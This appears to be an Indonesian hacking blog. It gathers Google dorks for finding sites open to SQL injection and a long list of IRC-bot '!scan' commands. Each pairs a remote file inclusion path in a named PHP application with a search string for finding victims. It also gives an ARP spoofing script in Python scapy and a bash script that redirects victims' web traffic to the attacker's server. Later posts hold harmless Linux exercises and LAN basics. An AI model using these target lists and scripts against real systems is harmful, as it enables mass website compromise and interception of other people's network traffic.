Selasa, 19 April 2011

BUG SQL

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
Diposting oleh di Tidak ada komentar:

BUG RFI

!scan ///////?cmd&file= "List Users with Pics only?"
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= /MODx/
!scan /include/scripts/export_batch.inc.php?DIR= ModernBill
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement
!scan ?custompluginfile[]= index.php?categoryid=5
!scan ?custompluginfile[]= index.php?categoryid=10
!scan ?custompluginfile[]= index.php?categoryid=15
!scan /?installed_config_file= "PhpJobScheduler"
!scan /pjsfiles/modify.php?installed_config_file= "PhpJobScheduler"
!scan errors.php?error= "/com_rwcards" "/com_rwcards"
!scan //vwar/backup/errors.php?error= "errors.php"
!scan /s_loadenv.inc.php?DOCUMENT_ROOT= "netcat require"
!scan /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path= "php?option=com_rwcards" "php?option=com_rwcards"
!scan inc/functions.inc.php?config[ppa_root_path]= "Index - Albums"
!scan phphtml.php?htmlclass_path= "phphtml.php"
!scan /?path%5Bdocroot%5D= "/newspublish" "/newspublish"
!scan ?sIncPath= "powered by boonex"
!scan plugins/safehtml/HTMLSax3.php?dir[plugins]= "powered by boonex"
!scan errors.php?error= "powered by boonex"
!scan include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]= "powered by boonex"
!scan errors.php?error= "/ray.3.5" "/ray.3.5"
!scan ?sourcedir= index.php?sourcedir=
!scan errors.php?error= "/com_ponygallery"
!scan /?page= /?pagedb=?
!scan /?page= "ArticleBeach"
!scan /tools/send_reminders.php?noSet=0&includedir= includes/php-dbi.php
!scan errors.php?error= "Powered by Orca Interactive Forum Script"
!scan /?include_path= "guestbook"
!scan /?include_path= "action"+"poll_ident"
!scan /admin/include/lib.module.php?mod_root= "/cmsworks"
!scan errors.php?error= "/com_extcalendar"
!scan /admin/templates/template_thumbnail.php?thumb_template= "Powered by HomePH Design"
!scan /includes/header.php?c_temp_path= "/header.php"
!scan /include/admin.lib.inc.php?site_path= "include/lib.inc.php"
!scan errors.php?error= "phpkit" "phpkit"
!scan errors.php?error= "/contenido/includes"
!scan popup.php?path= "phpkit" "phpkit"

!scan includes/ktedit/toolbar.php?dirDepth= ktmlpro
!scan ?custompluginfile%5B%5D= Subdreamer categoryid
!scan ?custompluginfile%5B%5D= “Website Powered by Subdreamer”
!scan include/lib.inc.php?site_path= rgboard ppppppppp
!scan index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path= “/includes/mambo.php”
!scan index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path= “mambo/index.php”
!scan demo1/auction_confirmation.inc.php/header.php?prefix= browse.php?id=?
!scan phpAdsNew/view.inc.php?phpAds_path= auction/index.php
!scan playing.php/common/db.php?commonpath= inurl:”playing.php”
!scan viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= “Powered by phpBB 2.0″ “Powered by phpBB 2.0″+org “Powered by phpBB 2.0″ “Powered by phpBB 2.0″+hk
!scan errors.php?error= “index of” errors.php
!scan index.php?option=com_custompages&cpage= inurl:”com_custompages”
!scan index2.php?option=com_custompages&cpage= inurl:”com_custompages”
!scan mainbody.php?option=com_custompages&cpage= inurl:”com_custompages”
!scan editsite.php?returnpath= “editsite.php”
!scan slice.php3?GLOBALS[AA_INC_PATH]= slice.php3?GLOBALS[AA_INC_PATH]=
!scan files/carprss.php?CarpPath= “by SiteBuilder Elite”
!scan accounts/inc/include.php?language=0&lang_settings[0][1]= “Powered by IceWarp Software Merak Email Server” IceWarp Web Mail 5.4
!scan config.inc.php?path_escape= home “post ad” “post event” “post image”
!scan ipblock.inc.php?path_escape= home “post ad” “post event” “post image”
!scan ipblock.inc.php?path_escape= event(s) today “All Upcoming Events”
!scan ws/login.php?noSet=0&includedir= “Public Access (Login)” WebCalendar
!scan vwar/convert/mvcw.php?step=1&vwar_root= “de/vwar”
!scan protection.php?action=logout&siteurl= “approved by TheFanlistings.org”
!scan ?mosConfig_absolute_path= “Free Software released under the GNU/GPL License”
!scan ?mosConfig_absolute_path= Joomla Template by
!scan plugins/spamx/MassDelete.Admin.class.php?_CONF[path]= “All trademarks and copyrights on this page are owned by their respective owners” Geeklog
!scan plugins/spamx/MailAdmin.Action.class.php?_CONF[path]= “Powered By GeekLog” “Created this page in” seconds
!scan admin.php?include_path= “Teken het gastenboek” Onderhoud

>> –>

!scan includes/db_connect.php?baseDir= “Version 2.0.4 “You must have cookies enabled in your browser”
!scan bookmark4u/lostpasswd.php?env[include_prefix]= bookmark4u214\1234567890′/*
!scan protection.php?action=logout&siteurl= “Members” “The complete list” “view sorted by country” “/members.php?id=all” >> mulai
!scan protection.php?action=logout&siteurl= “/members.php?id=all”
!scan protection.php?action=logout&siteurl= “Members” “The complete list” “view sorted by country” “ID” “Name” “Email” “URL”
!scan accueil.php?menu= “asso.fr/accueil.php?menu=”
!scan comments-display-tpl.php?config[comments_form_tpl]= “Powered By TalkBack”
!scan /?file= inurl:?/?file=contact? intext:?About Us? -cfm -asp -index.php -.cgi -aspx mulai
!scan modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= “.php?name=Forums”
!scan modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= PNphpBB2
!scan plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]= geeklog
!scan admin.php?include_path= “IP-adres genoteerd” “HTML is”
!scan index.php?strona= “/index.php?strona=”
!scan index.php?strona= “/index.php?strona=” site:pl oiui
!scan index1.php?page= “/index1.php?page=”
!scan index1.php?page= “/index1.php?page=” “.php”
!scan includes/functions_mod_user.php?phpbb_root_path= phpBBViet
!scan ?mosConfig_absolute_path= “Joomla! is Free Software released under the GNU/GPL License.”
!scan ?mosConfig_absolute_path= “Joomla Is”
!scan language/lang_english/lang_main_album.php?phpbb_root_path= “Czech translation by Vitek”
!scan index.php?pg= “Search | Invite | Mail | Blog | Forum” site:mx
!scan administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path= inurl:”com_jjgallery
!scan modules/Neos_Chronos/header.php?base_folder= “Neos_Chronos”
!scan historytemplate.php?cms[support]=1&cms[tngpath]= “powered by The Next Generation of Genealogy Sitebuilding”
!scan includes/messages.inc.php?include_path= messages.inc.php
!scan contact.php?AD_BODY_TEMP= “Not+required+for+reporting+a+file”
!scan includes/db_connect.php?baseDir= “dotProject” “Version” “cookie” site:cn
!scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= /modules/Forums/
!scan contenido/classes/class.inuse.php?cfg[path][contenido]= Contenido Login
!scan includes/db_connect.php?baseDir= “dotProject logo”
!scan index.php?lg= “index.php?lg=” site:be
!scan skin/zero_vote/ask_password.php?dir= zeroboard site:.us
!scan admin.php?include_path= “Total Records:” “HTML code is” “Advanced” site:.com
!scan index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= mambo
!scan admin.php?include_path= “Total Records:” “HTML code is” “Advanced
!scan components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path= com_pollxt
!scan administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path= com_colophon
!scan components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path= com_loudmounth
!scan components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= com_videodb
!scan components/com_cloner/cloner.php?mosConfig_absolute_path= “joomla”
!scan administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path= com_multibanners
!scan administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site= com_a6mambohelpdesk
!scan components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path= com_mambatstaff
!scan components/com_securityimages/configinsert.php?mosConfig_absolute_path= com_securityimages
!scan components/com_securityimages/lang.php?mosConfig_absolute_path= com_securityimages
!scan components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= com_artlinks
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= com_galleria
!scan administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= com_mgm
!scan components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path= com_mambatstaff
!scan redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]= inurl:redaxo
!scan admin.php?include_path= Advanced Guestbook 2.3.4
!scan template.php?page= phpBB Group
!scan phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path= phpBB Group
!scan forum/admin/admin_cash.php?setmodules=1&phpbb_root_path= phpBB Group
!scan mods/iai/includes/constants.php?phpbb_root_path= phpBB PlusXL
!scan phpBB2-MODificat/includes/functions.php?phpbb_root_path= PHPBB2
!scan includes/bbcb_mg.php?phpbb_root_path= phpBBXS
!scan includes/archive/archive_topic.php?phpbb_root_path= phpbbXtra
!scan modules.php?op=modload&name=Wiki&file=index&pagename= PHP-Wiki
!scan includes/setup.php?phpc_root_path= PHP-Calendar
!scan templates/default/tpl_message.php?right_file= “PHP TopTree BBS”
!scan config.php?fullpath= “PHP TopSites” popopo
!scan auction/email_request.php?user_id= “PHP Surveyor”
!scan modules/projects/index.php?full_path= “PHP Project Management”
!scan xarg_corner.php?xarg= “PHP Image XArg”
!scan screen.php?neurl= “News Evolution” ste
!scan /_theme/breadcrumb.php?rootBase= new Female Celebrities
!scan show.php?file= “Helplink”
!scan form.php?floap=modfich&do= GenesisTrader
!scan inc/pipe.php?HCL_path= “Help Center Live”
!scan admin/business_inc/saveserver.php?thisdir= confixx
!scan modules/Forums/favorites.php?nuke_bb_root_path= “Powered by Platinum”
!scan /manager/index.php= “Etomite”
!scan /index.php?basePath= “gizzar”
!scan /Index.php?abs_url= “PEGames”
!scan /index.php?page= “3editor CMS”
!scan /index.php?AML_opensite= “AllMyLinks”
!scan /index.php?AMV_openconfig=1&AMV_serverpath= “AllMyVisitors”
!scan /lang/index.php?file= “oreon”
!scan /index.php?gen= “mafia-2-0-0″
!scan /index.php?catid= “CascadianFAQ”
!scan /index.php?rootpath= “DreamStats System”
!scan /index.php?n= “Jupiter CMS”
!scan /index.php?option=news&aktion=komm&ID= “HC NEWSSYSTEM”
!scan /index.php?function=custom&custom= “Shopping Catalog”
!scan /admin/index.php?p= “iPrimal”
!scan /classes/index.php?siteconf= “Lithium”
!scan /Cookie/index.php= “Imageview”
!scan /index.php= “Berty Forum”
!scan /index.php?section= “Jasmine-Web”
!scan /index.php?contentSpecial= “eboli”
!scan /templates/tmpl_dfl/scripts/index.php?dir[inc]= “Boonex Dolphin”
!scan /index.php?page= “tagit2b”
!scan /index.php?catid= “PHP Classifieds”
!scan /search.php?catid_search= “PHP Classifieds”
!scan /p!scan /search.php?catid_search= “PHP Classifieds”
!scan /index.php?file_name[]= “PowerPortal”
!scan /admin/index.php?o= “BrudaGB”
!scan /index.php?gr_1_id= “Eskolar”
!scan /boitenews4/index.php?url_index= “Boite de News”
!scan /index.php?news_include_path= “newsReporter”
!scan /index.php?page= “ClanSys”
!scan /index.php?mod=sondages&do= “PwsPHP”
!scan /appserv/main.php?appserv_root= appserv
!scan solpot.html?body= allinurl: “solpot.html?body”
!scan /config.php?xcart_dir= “X-CART”
!scan /ws/login.php?includedir= WebCalendar
!scan /ws/login.php?includedir= WebCalendar v0.9.45
!scan ocp-103/index.php?req_path= ocPortal
!scan images/evil.php?owned= e107
!scan index.php?module=PostWrap&page= PostNuke PostWrap
!scan mcNews/admin/header.php?skinfile= mcNews
!scan inc/download_center_lite.inc.php?script_root= “Download Center Lite”
!scan zboard/zboard.php?id= Zeroboard
!scan index.php?node=system&op=extop&ext=statman&eop=/visitor&ip= Nodez
!scan include/SQuery/gameSpy2.php?libpath= intitle:”Autonomous LAN party”
!scan event.php?myevent_path= MyEvent
!scan index.php?page= “Internet PhotoShow”
!scan mod/authent.php4?rootpath= RechnungsZentrale
!scan about.php?DFORUM_PATH= dForum
!scan post.php?DFORUM_PATH= dForum
!scan movie_cls.php?full_path= Built2Go
!scan /toplist.php?f=toplist_top10&phpbb_root_path= inurl:”toplist.php” “powered by phpbb”
!scan admin/addentry.php?phpbb_root_path= inurl:guestbook.php “Advanced GuestBook” “powered by phpbb”
!scan /master.php?root_path= inurl:/system/article/alltopics.php
!scan /master.php?root_path= inurl:/system/user/index.php
!scan includes/kb_constants.php?module_root_path= “Powered by Knowledge Base”
!scan /classes/adodbt/sql.php?classes_dir= inurl:”index2.php?option=rss”
!scan /classes/adodbt/sql.php?classes_dir= “powered By Limbo CMS”
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= “Powered By Aardvark Topsites PHP 4.2.2″
!scan agenda.php3?rootagenda= “Powered by phpMyAgenda”
!scan agenda2.php3?rootagenda= “Powered by phpMyAgenda”
!scan show.php?path= inurl:”fclick.php?”
!scan eshow.php?Config_rootdir= “powered by Albinator”
!scan auction/auction_common.php?phpbb_root_path= intext:”phpbb – auction”
!scan auction/auction_common.php?phpbb_root_path= inurl:auction
!scan visible_count_inc.php?statitpath= inurl:visible
!scan index.php?inc_dir= “Powered by TotalCalendar” rrr
!scan /phpdig/includes/config.php?relative_script_path= “JetBox CMS”
!scan embed/day.php?path= intitle:”Login to Calendar”
!scan includes/dbal.php?eqdkp_root_path= “powered by EQdkp”
!scan claroline/auth/ldap/authldap.php?includePath= Dokeos
!scan /direct.php?rf= “ActualScripts, Company. All rights reserved.”
!scan /config.php?returnpath= “PHPListPro ?2001-2006 SmartISoft”
!scan addsite.php?returnpath= “PHPListPro ?2001-2006 SmartISoft”
!scan auth/auth.php?phpbb_root_path= phpRaid
!scan auth/auth_phpbb/phpbb_root_path= phpRaid
!scan includes/pafiledb_constants.php?module_root_path= PafileDB
!scan index.php?phpbb_root_path= “Powered by foing”
!scan extras/poll/poll.php?file_newsportal= “TR Newsportal” brought by TRanx.
!scan cart_content.php?cart_isp_root= inurl:/squirrelcart/
!scan ezusermanager_pwd_forgott.php?ezUserManager_Path= “powered by ezUserManager”
!scan includes/class_template.php?quezza_root_path= “Quezza BB”
!scan sources/news.php?CONFIG[main_path]= “Powered By ScozNews”
!scan classified_right.php?language_dir= phpbazar
!scan cron.php?ROOT_PATH= “powered by phpmydirectory”
!scan cron.php?ROOT_PATH= intext:”2001-2006 phpMyDirectory.com”
!scan reconfig.php?GLOBALS[CLPath]= “CaLogic Calendars”
!scan srxclr.php?GLOBALS[CLPath]= “CaLogic Calendars”
!scan sources/post.php?fil_config= “Fusion News”
!scan addpost_newpoll.php?addpoll=preview&thispath= allinurl:/ubbthreads/
!scan BE_config.php?_PSL[classdir]= “Back-End CMS”
!scan /index.php?site_path= “Powered by SocketMail”
!scan vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]= V-Webmail
!scan includes/mailaccess/pop3.php?CONFIG[pear_dir]= V-Webmail
!scan DOCEBO205/modules/credits/help.php?lang= “Docebo LMS”
!scan cached.php3?GLOBALS[AA_INC_PATH]= “APC ActionApps”
!scan jsview.php3?GLOBALS[AA_INC_PATH]= “APC ActionApps”
!scan auth.php3?GLOBALS[AA_INC_PATH]= “APC ActionApps”
!scan manager/frontinc/prepend.php?_PX_config[manager_path]= “Plume CMS”
!scan admin/lib_action_step.php?GLOBALS[CLASS_PATH]= “Hot Open Tickets”
!scan p-popupgallery.php?l= “F@cile Interactive Web”
!scan ubbt.inc.php?GLOBALS[thispath]= UBBThreads
!scan ubbt.inc.php?thispath= UBBThreads
!scan language/lang_english/lang_activity.php?phpbb_root_path= Activity MOD Plus phpBB
!scan blend_data/blend_common.php?phpbb_root_path= “Blend Portal”
!scan suche/search.php?config[fsBase]= “Fastpublish CMS”
!scan drucken.php?config[fsBase]= “Fastpublish CMS”
!scan includes/common.php?root_path= gnopaste
!scan error.php?default_path= “Ottoman CMS”
!scan app/edocument/edocument_basic_view_menu.php?system_path= metajour
!scan app/eproject/eproject_basic_view_menu.php?system_path= metajour
!scan app/erek/erek_basic_view_menu.php?system_path= metajour
!scan extension/article/article.class.php?system_path= metajour
!scan extension/search/search.class.php?system_path= metajour
!scan admin/menu.php?root_path= “AssoCIateD CMS”
!scan includes/webdav/server.php?bhconfig[bhfilepath]= Bytehoard
!scan include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]= “Redaxo CMS”
!scan class/Wiki/Wiki.php?c_node[class_path]= Igloo
!scan ashheadlines.php?pathtoashnews= “powered by ashnews”
!scan ashnews.php?pathtoashnews= “powered by ashnews”
!scan admin/common-menu.php?CONF[local_path]= Informium
!scan modules/Forums/admin/index.php?phpbb_root_path= PHP-Nuke
!scan modules/Forums/admin/admin_words.php?phpbb_root_path= PHP-Nuke
!scan modules/Forums/admin/admin_smilies.php?phpbb_root_path= PHP-Nuke
!scan modules/Forums/admin/admin_users.php?phpbb_root_path= “PHP-Nuke”
!scan applications/faq/Bs_Faq.class.php?APP[path][applications]= “BlueShoes Framework”
!scan applications/filemanager/file.php?APP[path][core]= “BlueShoes Framework”
!scan inc/logincheck.inc.php?path= Webspotblogging
!scan inc/global.php?path= Webspotblogging
!scan classes/phpmailer/class.cs_phpmailer.php?classes_dir= Powered by CS-Cart – Shopping Cart Software
!scan /index.php?file_path= “dotwidget Printer-friendly”
!scan /includes/common.inc?file_path= “dotwidget Printer-friendly”
!scan /auth.cookie.inc.php?da_path= “powered by DreamAccount”
!scan /auth.header.inc.php?da_path= “powered by DreamAccount”
!scan _wk/wk_lang.php?WK[wkPath]= Wikiwig
!scan contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]= OpenEMR
!scan sources/post.php?fil_config= Xtreme/Ditto News
!scan class/jpcache/jpcache.php?_PSL[classdir]= “Back-end CMS”
!scan dialogs/td.php?spaw_root= cms-bandits
!scan dialogs/img.php?spaw_root= cms-bandits
!scan footer.php?absolutepath= “Enterprise Payroll Systems”
!scan admin/footer.php?absolutepath= “Enterprise Payroll Systems”
!scan phpcodecabinet_directory/include/Beautifier/Core.php?BEAUT_PATH= PHPCodeCabinet
!scan calendar.php?cfg_dir= “Visual Events Calendar”

!scan includes/usercp_register.php?phpbb_root_path= ZoneX 1.0.3 – Publishers Gold Edition

!scan lib/auth.inc.php?INIT_PATH= docpile:we !scan article-raw.php?file_newsportal= phNNTP

!scan genpage-cgi.php?REP_INC= Hitweb !scan CheckUpload.php?Language= “Cwfm-0.9.1″

!scan boitenews4/index.php?url_index= “Boite de News” !scan common.inc.php?CFG[libdir]= “PgMarket”

!scan owimg.php3?path= “See-Commerce” !scan tags.php?BBCodeFile= Tagger

!scan examples/image.php?image= “powered by twg”

!scan examples/examples/image.php2?image= “powered by twg”

!scan include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:”phpwcms/index.php?id=”

!scan src/Login.php?page= “Spaminator” !scan config.php?root_path= Thatware

!scan index.php?page= SaveWebPortal !scan inc/header.inc.php?ficStyle= phpPrintAnalyzer

!scan Classes/Event_for_month.php?_BASE= Chaussette

!scan install/install3.php?database=none&cabsolute_path= “WEBInsta Mailing list manager”

!scan BaseLoader.php?glConf[path_libraries]= MVCnPHP

!scan includes/session.php?wb_class_dir= Wheatblog

!scan index.php?templates_dir= “WEBinsta CMS”

!scan common.php?rootdir= projectbutler

!scan inc/indexhead.php?fileloc= discloser

!scan modules/usersonline/users.php?module_dir= “WEBinsta CMS”

!scan lib/specialdays.php?path_pre= “PHProjekt”

!scan lib/dbman_filter.inc.php?lib_path= “PHProjekt”

!scan classes/query.class.php?baseDir= dotProject

!scan include/urights.php?CRM_inc= Outreach Project Tool

!scan system/includes/pageheaderdefault.inc.php?_sysSessionPath= IRSR – Invisionix Roaming System Remote

!scan s03.php?shopid= powergap

!scan administrator/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= inurl:”/com_mtree/”

!scan administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= inurl:”com_a6mambocredits”

!scan handlers/email/mod.listmail.php?_PM_[path][handler]= PHlyMail Lite

!scan app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= phpCodeGenie

!scan administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path= inurl:”com_kochsuite”

!scan plugins/1_Adressbuch/delete.php?folder= Sonium Enterprise Adressbook AoAo

!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= com_cropimage

!scan admin/autoprompter.php?CONFIG[BASE_PATH]= Cce-interact

!scan includes/common.inc.php?CONFIG[BASE_PATH]= Cce-interact

!scan include/novalib/class.novaEdit.mysql.php?TNLIB_DIR= Tutti Nova

!scan news.php?CONFIG[script_path]= Fantastic News

!scan include/yapbb_session.php?GLOBALS[includeBit]=devilteam&cfgIncludeDirectory= YapBB

!scan local/lib/lcUser.php?LIBDIR= “Local Calendar” !scan ?langage= EPNadmin

!scan themes/program/themesettings.inc.php?themesdir= “Segue CMS”

!scan lib/rs.php?rootpath= CASTOR

Diposting oleh di Tidak ada komentar:

Selasa, 22 Februari 2011

spoofing

scipt buat spoofing = python nya

#from scapy.all import *;
#from time import sleep;
#conf.iface='wlan0';#network card XD

#target="172.16.16.47";#target /victim

#router="172.16.16.1";#routernya

#packet = ARP(); #bikin packet :P:P

#packet.psrc = router # Gateway

#packet.pdst = target # victim v.v

#try:
#while 1:
#send(packet, verbose=0);
#sleep(50);
#except:
#pass


dan yang ini adalah . . .bash nya =


#########################################################
# 4l4N #
# Malang cyber crew #
# kill-9 crew #
# indonesiancoder team #
#########################################################
#!/bin/sh
#INTERFACE="wlan0"
#SERVERWEB='172.16.16.5' #ip ente

#echo 1 > /proc/sys/net/ipv4/ip_forward
#echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects

#clear rule..
#iptables --flush
#iptables --zero
#iptables --delete-chain
#iptables -F -t nat

#iptables --append FORWARD --in-interface $INTERFACE --jump ACCEPT
#iptables --table nat --append POSTROUTING --out-interface $INTERFACE --jump #MASQUERADE

#rendirect traffic.. on my server/proxy
#iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination #$SERVERWEB
#iptables -t nat -A PREROUTING -p tcp --dport 443 --jump DNAT --to-destination #$SERVERWEB
Diposting oleh di Tidak ada komentar:

Jumat, 03 Desember 2010

Dasar2 linux

mum

  • Run top in one terminal while you do the exercises in another. Jalankan teratas dalam satu terminal saat Anda melakukan latihan di tempat lain.

  • Run the ps command. Jalankan perintah ps.

  • Read the man pages to find out how to display all your processes. Baca halaman manual untuk mencari tahu bagaimana untuk menampilkan semua proses Anda.

  • Run the command find / . Jalankan perintah find /. What effect does it have on system load? Apa pengaruhnya apakah itu terhadap load sistem? Stop this command. Berhenti perintah ini.

  • In graphical mode, start the xclock program in the foreground. Dalam mode grafis, memulai program xclock di latar depan. Then let it run in the background. Lalu biarkan berjalan di latar belakang. Stop the program using the kill command. Hentikan program menggunakan perintah kill.

  • Run the xcalc directly in the background, so that the prompt of the issuing terminal is released. Jalankan xcalc langsung di latar belakang, sehingga prompt dari terminal menerbitkan dilepaskan.

  • What does kill -9 -1 do? Apa kill -9 -1 lakukan?

  • Open two terminals or terminal windows again and use write to send a message from one to the other. Buka dua terminal atau jendela terminal lagi dan menggunakan menulis untuk mengirim pesan dari satu ke yang lain.

  • Issue the dmesg command. Masalah perintah dmesg. What does it tell? Apa tahu?

  • How long does it take to execute ls in the current directory? Berapa lama waktu yang diperlukan untuk menjalankan ls di direktori saat ini?

  • Based on process entries in /proc , owned by your UID, how would you work to find out which processes these actually represent? Berdasarkan proses entri di / proc, yang dimiliki oleh UID Anda, bagaimana Anda bekerja untuk mengetahui proses-proses ini benar-benar mewakili?

  • How long has your system been running? Berapa lama Anda sistem telah berjalan?

  • Which is your current TTY? Yang Anda TTY saat ini?

  • Name 3 processes that couldn't have had init as an initial parent. Nama 3 proses yang tidak bisa memiliki init sebagai orang tua awal.

  • Name 3 commands which use SUID mode. Nama 3 perintah yang menggunakan modus SUID. Explain why this is so. Jelaskan mengapa demikian.

  • Name the commands that are generally causing the highest load on your system. Nama perintah yang umumnya menyebabkan beban tertinggi pada sistem anda.

@

Booting, init dll

  • Can you reboot the system as a normal user? Dapatkah anda reboot sistem sebagai user biasa? Why is that? Kenapa begitu?

  • According to your current run level, name the steps that are taken during shutdown. Menurut runlevel Anda saat ini, nama langkah-langkah yang diambil selama shutdown.

  • How do you change the system run level? Bagaimana Anda mengubah tingkat menjalankan sistem? Switch from your default run level to run level 1 and vice versa. Beralih dari runlevel default ke run level 1 dan sebaliknya.

  • Make a list of all the services and daemons that are started up when your system has booted. Buatlah daftar semua layanan dan daemon yang dimulai ketika sistem anda boot.

  • Which kernel is currently load at startup? Yang kernel saat ini beban pada saat startup?

  • Suppose you have to start some exotic server at boot time. Misalkan anda harus mulai beberapa server eksotis pada saat boot. Up until now, you logged in after booting the system and started this server manually using a script named deliver_pizza in your home directory. Sampai sekarang, Anda login setelah boot sistem dan mulai server secara manual menggunakan skrip bernama deliver_pizza di direktori home Anda. What do you have to do in order to have the service start up automatically in run level 4, which you defined for this purpose only? Apa yang harus Anda lakukan dalam rangka untuk memiliki layanan start up secara otomatis di tingkat, jalankan 4 yang Anda ditetapkan untuk tujuan ini saja?

@

Penjadwalan

  • Use sleep to create a reminder that your pasta is ready in ten minutes. Gunakan tidur untuk menciptakan sebuah pengingat bahwa pasta anda sudah siap dalam sepuluh menit.

  • Create an at job that copies all files in your home directory to /var/tmp within half an hour. Buat pada pekerjaan yang salinan semua file dalam direktori home anda ke / var / tmp dalam waktu setengah jam. You may want to create a sub-directory in /var/tmp . Anda mungkin ingin membuat sub-direktori di / var / tmp.

  • Make a cronjob that does this task every Monday to Friday during lunch. Membuat tugas cron yang melakukan tugas ini setiap hari Senin sampai Jumat saat makan siang.

  • Check that it works. Periksa bahwa ia bekerja.

  • Make a mistake in the crontab entry, like issuing the nonexistent command coppy instead of cp . Membuat kesalahan dalam entri crontab, seperti mengeluarkan perintah tidak ada coppy bukan cp. What happens upon execution of the task? Apa yang terjadi pada saat pelaksanaan tugas?

from http://www.tldp.org
Diposting oleh di Tidak ada komentar:

Selasa, 08 Juni 2010

Pengenalan Jaringan

Pengertian dan Prinsip Kerja LAN
================================

LAN dapat definisikan sebagai network atau jaringan sejumlah sistem
komputer yang lokasinya terbatas didalam satu gedung, satu kompleksgedung
atau suatu kampus dan tidak menggunakan media fasilitas komunikasi umum
seperti telepon, melainkan pemilik dan pengelola media komunikasinya
adalah pemilik LAN itu sendiri.
Dari definisi diatas dapat kita ketahui bahwa sebuah LAN dibatasi oleh
lokasi secara fisik. Adapun penggunaan LAN itu sendiri mengakibatkansemua
komputer yang terhubung dalam jaringan dapat bertukar data atau dengan
kata lain berhubungan. Kerjasama ini semakin berkembang dari hanya
pertukaran data hingga penggunaan peralatan secara bersama.
LAN yang umumnya menggunakan hub, akan mengikuti prinsip kerja hub itu
sendiri. Dalam hal ini adalah bahwa hub tidak memiliki pengetahuantentang
alamat tujuan sehingga penyampaian data secara broadcast, dan juga karena
hub hanya memiliki satu domain collision sehingga bila salah satu port
sibuk maka port-port yang lain harus menunggu.



Komponen-komponen Dasar LAN
===========================

Beberapa komponen dasar yang biasanya membentuk suatu LAN adalah sebagai
berikut:

•Workstation
------------
Workstation merupakan node atau host yang berupa suatu sistem komputer.
Sistem komputer ini dapat berupa PC atau dapat pula berupa suatu komputer
yang besar seperti sistem minicomputer, bahkan suatu mainframe.
Workstation dapat bekerja sendiri (stand-alone) dapat pula menggunakan
jaringan untuk bertukar data dengan workstation atau user yang lain.

•Server
-------
Perangkat keras (hardware) yang berfungsi untuk melayani jaringan dan
workstation yang terhubung pada jaringan tersebut.pada umumnya sumber
daya (resources) seperti printer, disk, dan sebagainya yang hendak
digunakan secara bersama oleh para pemakai di workstation berada dan
bekerja pada server. Berdasarkan jenis pelayanannya dikenal disk server,
file server, print server, dan suatu server juga dapat mempunyai beberapa
fungsi pelayanan sekaligus.

•Link (hubungan)
----------------
Workstation dan server tidak dapat berfungsi apabila peralatan tersebut
secara fisik tidak terhubung. Hubungan tersebut dalam LAN dikenal sebagai
media transmisi yang umumnya berupa kabel. Adapun beberapa contoh dari
link adalah:
1.Kabel Twisted Pair
•Kabel ini terbagi dua, yaitu Shielded Twisted Pair dan Unshielded Twisted
Pair(UTP)
•Lebih banyak dikenal karena merupakan kabel telpon
•Relatif murah
•Jarak yang pendek
•Mudah terpengaruh oleh gangguan
•Kecepatan data yang dapat didukung terbatas, 10-16 Mbps

2.Kabel Coaxial
•Umumnya digunakan pada televisi
•Jarak yang relatif lebih jauh
